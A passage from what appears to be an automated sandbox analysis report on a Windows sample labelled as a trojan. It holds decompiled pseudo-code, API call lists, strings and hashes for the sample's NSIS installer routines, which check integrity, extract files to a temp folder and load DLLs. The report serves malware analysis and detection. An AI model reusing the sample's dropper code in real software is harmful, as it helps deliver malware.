						__eflags = _t89 & 0xfffffff0;
						if((_t89 & 0xfffffff0) != 0) {
							goto L20;
						}
						__eflags = _v36 - 0xdeadbeef;
						if(_v36 != 0xdeadbeef) {
							goto L20;
						}
						__eflags = _v24 - 0x74736e49;
						if(_v24 != 0x74736e49) {
							goto L20;
						}
						__eflags = _v28 - 0x74666f73;
						if(_v28 != 0x74666f73) {
							goto L20;
						}
						__eflags = _v32 - 0x6c6c754e;
						if(_v32 != 0x6c6c754e) {
							goto L20;
						}
						_a4 = _a4 | _t89;
						_t104 =  *0x420ef0; // 0xd0fa7
						 *0x42a300 =  *0x42a300 | _a4 & 0x00000002;
						_t92 = _v16;
						__eflags = _t92 - _t110;
						 *0x42a274 = _t104;
						if(_t92 > _t110) {
							goto L32;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L16:
							_v12 = _v12 + 1;
							_t110 = _t92 - 4;
							__eflags = _t107 - _t110;
							if(_t107 > _t110) {
								_t107 = _t110;
							}
							goto L20;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							break;
						}
						goto L16;
						L20:
						__eflags = _t110 -  *0x420f00; // 0xd19c2
						if(__eflags < 0) {
							_v8 = E00406B22(_v8, 0x418ef0, _t107);
						}
						 *0x420ef0 =  *0x420ef0 + _t107;
						_t110 = _t110 - _t107;
						__eflags = _t110;
					} while (_t110 != 0);
					_t94 = 0;
					__eflags = 0;
					goto L24;
				}
			}
































                                                                                    0x004030db
                                                                                    0x004030de
                                                                                    0x004030e1
                                                                                    0x004030fb
                                                                                    0x00403100
                                                                                    0x00403113
                                                                                    0x00403118
                                                                                    0x0040311e
                                                                                    0x00000000
                                                                                    0x00403120
                                                                                    0x00403131
                                                                                    0x00403142
                                                                                    0x00403149
                                                                                    0x0040314f
                                                                                    0x00403151
                                                                                    0x00403156
                                                                                    0x00403158
                                                                                    0x00403243
                                                                                    0x00403245
                                                                                    0x0040324a
                                                                                    0x00403251
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00403257
                                                                                    0x0040325a
                                                                                    0x00403286
                                                                                    0x0040328b
                                                                                    0x00403296
                                                                                    0x00403298
                                                                                    0x004032a9
                                                                                    0x004032c4
                                                                                    0x004032ca
                                                                                    0x004032cd
                                                                                    0x004032d2
                                                                                    0x004032f1
                                                                                    0x00403301
                                                                                    0x00403313
                                                                                    0x00403318
                                                                                    0x0040331d
                                                                                    0x00403320
                                                                                    0x00403329
                                                                                    0x0040332d
                                                                                    0x00403335
                                                                                    0x0040333a
                                                                                    0x0040333c
                                                                                    0x0040333c
                                                                                    0x0040333c
                                                                                    0x00403344
                                                                                    0x00403344
                                                                                    0x00403347
                                                                                    0x00403348
                                                                                    0x00403348
                                                                                    0x0040334b
                                                                                    0x0040334d
                                                                                    0x0040334d
                                                                                    0x0040334d
                                                                                    0x00403350
                                                                                    0x00403357
                                                                                    0x00403363
                                                                                    0x00403368
                                                                                    0x00000000
                                                                                    0x00403368
                                                                                    0x00000000
                                                                                    0x00403320
                                                                                    0x00000000
                                                                                    0x004032d4
                                                                                    0x00403262
                                                                                    0x0040326d
                                                                                    0x00403272
                                                                                    0x00403274
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040327d
                                                                                    0x00403280
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040315e
                                                                                    0x00403163
                                                                                    0x00403168
                                                                                    0x0040316c
                                                                                    0x00403173
                                                                                    0x00403178
                                                                                    0x0040317a
                                                                                    0x0040317c
                                                                                    0x0040317c
                                                                                    0x00403180
                                                                                    0x00403185
                                                                                    0x00403187
                                                                                    0x004032e0
                                                                                    0x00403322
                                                                                    0x00000000
                                                                                    0x00403322
                                                                                    0x0040318d
                                                                                    0x00403194
                                                                                    0x00403210
                                                                                    0x00403214
                                                                                    0x00403218
                                                                                    0x0040321d
                                                                                    0x00000000
                                                                                    0x00403214
                                                                                    0x0040319d
                                                                                    0x004031a2
                                                                                    0x004031a5
                                                                                    0x004031aa
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004031ac
                                                                                    0x004031b3
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004031b5
                                                                                    0x004031bc
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004031be
                                                                                    0x004031c5
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004031c7
                                                                                    0x004031ce
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004031d0
                                                                                    0x004031d6
                                                                                    0x004031df
                                                                                    0x004031e5
                                                                                    0x004031e8
                                                                                    0x004031ea
                                                                                    0x004031f0
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004031f6
                                                                                    0x004031fa
                                                                                    0x00403202
                                                                                    0x00403202
                                                                                    0x00403205
                                                                                    0x00403208
                                                                                    0x0040320a
                                                                                    0x0040320c
                                                                                    0x0040320c
                                                                                    0x00000000
                                                                                    0x0040320a
                                                                                    0x004031fc
                                                                                    0x00403200
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040321e
                                                                                    0x0040321e
                                                                                    0x00403224
                                                                                    0x00403230
                                                                                    0x00403230
                                                                                    0x00403233
                                                                                    0x00403239
                                                                                    0x00403239
                                                                                    0x00403239
                                                                                    0x00403241
                                                                                    0x00403241
                                                                                    0x00000000
                                                                                    0x00403241

                                                                                    APIs
                                                                                    • GetTickCount.KERNEL32 ref: 004030E4
                                                                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exe,00000400), ref: 00403100
                                                                                      • Part of subcall function 00406158: GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exe,80000000,00000003), ref: 0040615C
                                                                                      • Part of subcall function 00406158: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                                                                                    • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exe,C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exe,80000000,00000003), ref: 00403149
                                                                                    • GlobalAlloc.KERNELBASE(00000040,?), ref: 0040328B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14981204986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.14981181274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981262134.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981287805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981426539.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981453122.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981491518.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                    • API String ID: 2803837635-266182715
                                                                                    • Opcode ID: 0724999653b3e73eed60d379075ff5ac069807c872a81a0186dc1bcbf61f2663
                                                                                    • Instruction ID: 6a7077609e6cbe8902eef3654a796be60faa9129f620d49927b75729aeb44cd1
                                                                                    • Opcode Fuzzy Hash: 0724999653b3e73eed60d379075ff5ac069807c872a81a0186dc1bcbf61f2663
                                                                                    • Instruction Fuzzy Hash: 74710271A40204ABDB20DFB5DD85B9E3AACAB04315F21457FF901B72D2CB789E418B6D
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0040176F Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145stringtimeCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 512 40176f-401794 call 402da6 call 405fae 517 401796-40179c call 406668 512->517 518 40179e-4017b0 call 406668 call 405f37 lstrcatW 512->518 523 4017b5-4017b6 call 4068ef 517->523 518->523 527 4017bb-4017bf 523->527 528 4017c1-4017cb call 40699e 527->528 529 4017f2-4017f5 527->529 536 4017dd-4017ef 528->536 537 4017cd-4017db CompareFileTime 528->537 531 4017f7-4017f8 call 406133 529->531 532 4017fd-401819 call 406158 529->532 531->532 539 40181b-40181e 532->539 540 40188d-4018b6 call 4056ca call 403371 532->540 536->529 537->536 542 401820-40185e call 406668 * 2 call 4066a5 call 406668 call 405cc8 539->542 543 40186f-401879 call 4056ca 539->543 553 4018b8-4018bc 540->553 554 4018be-4018ca SetFileTime 540->554 542->527 574 401864-401865 542->574 555 401882-401888 543->555 553->554 557 4018d0-4018db CloseHandle 553->557 554->557 558 402c33 555->558 560 4018e1-4018e4 557->560 561 402c2a-402c2d 557->561 562 402c35-402c39 558->562 564 4018e6-4018f7 call 4066a5 lstrcatW 560->564 565 4018f9-4018fc call 4066a5 560->565 561->558 571 401901-402398 564->571 565->571 575 40239d-4023a2 571->575 576 402398 call 405cc8 571->576 574->555 577 401867-401868 574->577 575->562 576->575 577->543
                                                                                    C-Code - Quality: 77%
                                                                                    			E0040176F(FILETIME* __ebx, void* __eflags) {
				void* __esi;
				void* _t35;
				void* _t43;
				void* _t45;
				FILETIME* _t51;
				FILETIME* _t64;
				void* _t66;
				signed int _t72;
				FILETIME* _t73;
				FILETIME* _t77;
				signed int _t79;
				WCHAR* _t81;
				void* _t83;
				void* _t84;
				void* _t86;

				_t77 = __ebx;
				 *(_t86 - 8) = E00402DA6(0x31);
				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
				_t35 = E00405FAE( *(_t86 - 8));
				_push( *(_t86 - 8));
				_t81 = L"Call";
				if(_t35 == 0) {
					lstrcatW(E00405F37(E00406668(_t81, L"C:\\Users\\Arthur\\AppData\\Local\\Temp")), ??);
				} else {
					E00406668();
				}
				E004068EF(_t81);
				while(1) {
					__eflags =  *(_t86 + 8) - 3;
					if( *(_t86 + 8) >= 3) {
						_t66 = E0040699E(_t81);
						_t79 = 0;
						__eflags = _t66 - _t77;
						if(_t66 != _t77) {
							_t73 = _t66 + 0x14;
							__eflags = _t73;
							_t79 = CompareFileTime(_t73, _t86 - 0x24);
						}
						asm("sbb eax, eax");
						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
						__eflags = _t72;
						 *(_t86 + 8) = _t72;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) == _t77) {
						E00406133(_t81);
					}
					__eflags =  *(_t86 + 8) - 1;
					_t43 = E00406158(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
					__eflags = _t43 - 0xffffffff;
					 *(_t86 - 0x38) = _t43;
					if(_t43 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) != _t77) {
						E004056CA(0xffffffe2,  *(_t86 - 8));
						__eflags =  *(_t86 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t86 - 4)) = 1;
						}
						L31:
						 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t86 - 4));
						__eflags =  *0x42a2e8;
						goto L32;
					} else {
						E00406668("C:\Users\Arthur\AppData\Local\Temp\nsg40B0.tmp", _t83);
						E00406668(_t83, _t81);
						E004066A5(_t77, _t81, _t83, "C:\Users\Arthur\AppData\Local\Temp\nsg40B0.tmp\System.dll",  *((intOrPtr*)(_t86 - 0x1c)));
						E00406668(_t83, "C:\Users\Arthur\AppData\Local\Temp\nsg40B0.tmp");
						_t64 = E00405CC8("C:\Users\Arthur\AppData\Local\Temp\nsg40B0.tmp\System.dll",  *(_t86 - 0x30) >> 3) - 4;
						__eflags = _t64;
						if(_t64 == 0) {
							continue;
						} else {
							__eflags = _t64 == 1;
							if(_t64 == 1) {
								 *0x42a2e8 =  &( *0x42a2e8->dwLowDateTime);
								L32:
								_t51 = 0;
								__eflags = 0;
							} else {
								_push(_t81);
								_push(0xfffffffa);
								E004056CA();
								L29:
								_t51 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t51;
				}
				E004056CA(0xffffffea,  *(_t86 - 8)); // executed
				 *0x42a314 =  *0x42a314 + 1;
				_t45 = E00403371(_t79,  *((intOrPtr*)(_t86 - 0x28)),  *(_t86 - 0x38), _t77, _t77); // executed
				 *0x42a314 =  *0x42a314 - 1;
				__eflags =  *(_t86 - 0x24) - 0xffffffff;
				_t84 = _t45;
				if( *(_t86 - 0x24) != 0xffffffff) {
					L22:
					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
						goto L22;
					}
				}
				CloseHandle( *(_t86 - 0x38)); // executed
				__eflags = _t84 - _t77;
				if(_t84 >= _t77) {
					goto L31;
				} else {
					__eflags = _t84 - 0xfffffffe;
					if(_t84 != 0xfffffffe) {
						E004066A5(_t77, _t81, _t84, _t81, 0xffffffee);
					} else {
						E004066A5(_t77, _t81, _t84, _t81, 0xffffffe9);
						lstrcatW(_t81,  *(_t86 - 8));
					}
					_push(0x200010);
					_push(_t81);
					E00405CC8();
					goto L29;
				}
				goto L33;
			}


















                                                                                    0x0040176f
                                                                                    0x00401776
                                                                                    0x00401782
                                                                                    0x00401785
                                                                                    0x0040178a
                                                                                    0x0040178d
                                                                                    0x00401794
                                                                                    0x004017b0
                                                                                    0x00401796
                                                                                    0x00401797
                                                                                    0x00401797
                                                                                    0x004017b6
                                                                                    0x004017bb
                                                                                    0x004017bb
                                                                                    0x004017bf
                                                                                    0x004017c2
                                                                                    0x004017c7
                                                                                    0x004017c9
                                                                                    0x004017cb
                                                                                    0x004017d0
                                                                                    0x004017d0
                                                                                    0x004017db
                                                                                    0x004017db
                                                                                    0x004017ec
                                                                                    0x004017ee
                                                                                    0x004017ee
                                                                                    0x004017ef
                                                                                    0x004017ef
                                                                                    0x004017f2
                                                                                    0x004017f5
                                                                                    0x004017f8
                                                                                    0x004017f8
                                                                                    0x004017ff
                                                                                    0x0040180e
                                                                                    0x00401813
                                                                                    0x00401816
                                                                                    0x00401819
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040181b
                                                                                    0x0040181e
                                                                                    0x00401874
                                                                                    0x00401879
                                                                                    0x004015b6
                                                                                    0x0040292e
                                                                                    0x0040292e
                                                                                    0x00402c2a
                                                                                    0x00402c2d
                                                                                    0x00402c2d
                                                                                    0x00000000
                                                                                    0x00401820
                                                                                    0x00401826
                                                                                    0x0040182d
                                                                                    0x0040183a
                                                                                    0x00401845
                                                                                    0x0040185b
                                                                                    0x0040185b
                                                                                    0x0040185e
                                                                                    0x00000000
                                                                                    0x00401864
                                                                                    0x00401864
                                                                                    0x00401865
                                                                                    0x00401882
                                                                                    0x00402c33
                                                                                    0x00402c33
                                                                                    0x00402c33
                                                                                    0x00401867
                                                                                    0x00401867
                                                                                    0x00401868
                                                                                    0x00401493
                                                                                    0x0040239d
                                                                                    0x0040239d
                                                                                    0x0040239d
                                                                                    0x00401865
                                                                                    0x0040185e
                                                                                    0x00402c35
                                                                                    0x00402c39
                                                                                    0x00402c39
                                                                                    0x00401892
                                                                                    0x00401897
                                                                                    0x004018a5
                                                                                    0x004018aa
                                                                                    0x004018b0
                                                                                    0x004018b4
                                                                                    0x004018b6
                                                                                    0x004018be
                                                                                    0x004018ca
                                                                                    0x004018b8
                                                                                    0x004018b8
                                                                                    0x004018bc
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004018bc
                                                                                    0x004018d3
                                                                                    0x004018d9
                                                                                    0x004018db
                                                                                    0x00000000
                                                                                    0x004018e1
                                                                                    0x004018e1
                                                                                    0x004018e4
                                                                                    0x004018fc
                                                                                    0x004018e6
                                                                                    0x004018e9
                                                                                    0x004018f2
                                                                                    0x004018f2
                                                                                    0x00401901
                                                                                    0x00401906
                                                                                    0x00402398
                                                                                    0x00000000
                                                                                    0x00402398
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                                                                                    • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Temp,?,?,00000031), ref: 004017D5
                                                                                      • Part of subcall function 00406668: lstrcpynW.KERNEL32(?,?,00000400,004037B0,00429260,NSIS Error), ref: 00406675
                                                                                      • Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                                                      • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                                                      • Part of subcall function 004056CA: lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                                                                                      • Part of subcall function 004056CA: SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                                                                                      • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                                                      • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                                                      • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14981204986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.14981181274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981262134.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981287805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981426539.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981453122.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981491518.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                    • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsg40B0.tmp$C:\Users\user\AppData\Local\Temp\nsg40B0.tmp\System.dll$Call
                                                                                    • API String ID: 1941528284-177239989
                                                                                    • Opcode ID: 9e4c6fc02f2735517d3760028c1d27d68b0a7a64359a36d7c4e7c39eda4ba6af
                                                                                    • Instruction ID: 87dd38174d63fc88252c3cacf76d35d2aef1a13c6195c1d88e2760da23471212
                                                                                    • Opcode Fuzzy Hash: 9e4c6fc02f2735517d3760028c1d27d68b0a7a64359a36d7c4e7c39eda4ba6af
                                                                                    • Instruction Fuzzy Hash: DE41B771500205BACF10BBB5CD85DAE7A75EF45328B20473FF422B21E1D63D89619A2E
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 004056CA Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72stringwindowCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 578 4056ca-4056df 579 4056e5-4056f6 578->579 580 405796-40579a 578->580 581 405701-40570d lstrlenW 579->581 582 4056f8-4056fc call 4066a5 579->582 584 40572a-40572e 581->584 585 40570f-40571f lstrlenW 581->585 582->581 586 405730-405737 SetWindowTextW 584->586 587 40573d-405741 584->587 585->580 588 405721-405725 lstrcatW 585->588 586->587 589 405743-405785 SendMessageW * 3 587->589 590 405787-405789 587->590 588->584 589->590 590->580 591 40578b-40578e 590->591 591->580
                                                                                    C-Code - Quality: 100%
                                                                                    			E004056CA(signed int _a4, WCHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				WCHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				WCHAR* _t27;
				signed int _t28;
				long _t29;
				signed int _t37;
				signed int _t38;

				_t27 =  *0x429244;
				_v8 = _t27;
				if(_t27 != 0) {
					_t37 =  *0x42a314;
					_v12 = _t37;
					_t38 = _t37 & 0x00000001;
					if(_t38 == 0) {
						E004066A5(_t38, 0, 0x422728, 0x422728, _a4);
					}
					_t27 = lstrlenW(0x422728);
					_a4 = _t27;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t27 = SetWindowTextW( *0x429228, 0x422728); // executed
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x422728;
							_v52 = 1;
							_t29 = SendMessageW(_v8, 0x1004, 0, 0); // executed
							_v44 = 0;
							_v48 = _t29 - _t38;
							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52); // executed
							_t27 = SendMessageW(_v8, 0x1013, _v48, 0); // executed
						}
						if(_t38 != 0) {
							_t28 = _a4;
							0x422728[_t28] = 0;
							return _t28;
						}
					} else {
						_t27 = lstrlenW(_a8) + _a4;
						if(_t27 < 0x1000) {
							_t27 = lstrcatW(0x422728, _a8);
							goto L6;
						}
					}
				}
				return _t27;
			}

















                                                                                    0x004056d0
                                                                                    0x004056da
                                                                                    0x004056df
                                                                                    0x004056e5
                                                                                    0x004056f0
                                                                                    0x004056f3
                                                                                    0x004056f6
                                                                                    0x004056fc
                                                                                    0x004056fc
                                                                                    0x00405702
                                                                                    0x0040570a
                                                                                    0x0040570d
                                                                                    0x0040572a
                                                                                    0x0040572e
                                                                                    0x00405737
                                                                                    0x00405737
                                                                                    0x00405741
                                                                                    0x0040574a
                                                                                    0x00405756
                                                                                    0x0040575d
                                                                                    0x00405761
                                                                                    0x00405764
                                                                                    0x00405777
                                                                                    0x00405785
                                                                                    0x00405785
                                                                                    0x00405789
                                                                                    0x0040578b
                                                                                    0x0040578e
                                                                                    0x00000000
                                                                                    0x0040578e
                                                                                    0x0040570f
                                                                                    0x00405717
                                                                                    0x0040571f
                                                                                    0x00405725
                                                                                    0x00000000
                                                                                    0x00405725
                                                                                    0x0040571f
                                                                                    0x0040570d
                                                                                    0x0040579a

                                                                                    APIs
                                                                                    • lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                                                    • lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                                                    • lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                                                                                    • SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                                                    • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                                                      • Part of subcall function 004066A5: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                                                                                      • Part of subcall function 004066A5: lstrlenW.KERNEL32(Call,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14981204986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.14981181274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981262134.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981287805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981426539.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981453122.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981491518.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSendlstrlen$lstrcat$TextWindow
                                                                                    • String ID: ('B
                                                                                    • API String ID: 1495540970-2332581011
                                                                                    • Opcode ID: ecaae210665ee7222a04207821391202ddee9f1067a944388ad148c6c7792cdb
                                                                                    • Instruction ID: 7f52a71d89202be05388d2ae90ba5930d13dcc1e6093ad3ff4eaa481a322a782
                                                                                    • Opcode Fuzzy Hash: ecaae210665ee7222a04207821391202ddee9f1067a944388ad148c6c7792cdb
                                                                                    • Instruction Fuzzy Hash: C6217A71900518FACB119FA5DD84A8EBFB8EB45360F10857AF904B62A0D67A4A509F68
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 004069C5 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 592 4069c5-4069e5 GetSystemDirectoryW 593 4069e7 592->593 594 4069e9-4069eb 592->594 593->594 595 4069fc-4069fe 594->595 596 4069ed-4069f6 594->596 598 4069ff-406a32 wsprintfW LoadLibraryExW 595->598 596->595 597 4069f8-4069fa 596->597 597->598
                                                                                    C-Code - Quality: 100%
                                                                                    			E004069C5(intOrPtr _a4) {
				short _v576;
				signed int _t13;
				struct HINSTANCE__* _t17;
				signed int _t19;
				void* _t24;

				_t13 = GetSystemDirectoryW( &_v576, 0x104);
				if(_t13 > 0x104) {
					_t13 = 0;
				}
				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
					_t19 = 1;
				} else {
					_t19 = 0;
				}
				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
				return _t17;
			}








                                                                                    0x004069dc
                                                                                    0x004069e5
                                                                                    0x004069e7
                                                                                    0x004069e7
                                                                                    0x004069eb
                                                                                    0x004069fe
                                                                                    0x004069f8
                                                                                    0x004069f8
                                                                                    0x004069f8
                                                                                    0x00406a17
                                                                                    0x00406a2b
                                                                                    0x00406a32

                                                                                    APIs
                                                                                    • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069DC
                                                                                    • wsprintfW.USER32 ref: 00406A17
                                                                                    • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A2B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14981204986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.14981181274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981262134.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981287805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981426539.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981453122.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981491518.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                    Similarity
                                                                                    • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                    • String ID: %s%S.dll$UXTHEME$\
                                                                                    • API String ID: 2200240437-1946221925
                                                                                    • Opcode ID: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                                                                                    • Instruction ID: e2ac2e7087162e0187f8b4d6776822ec24d6e31928394cf94a41c199a4feb156
                                                                                    • Opcode Fuzzy Hash: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                                                                                    • Instruction Fuzzy Hash: 3AF096B154121DA7DB14AB68DD0EF9B366CAB00705F11447EA646F20E0EB7CDA68CB98
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00405B99 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
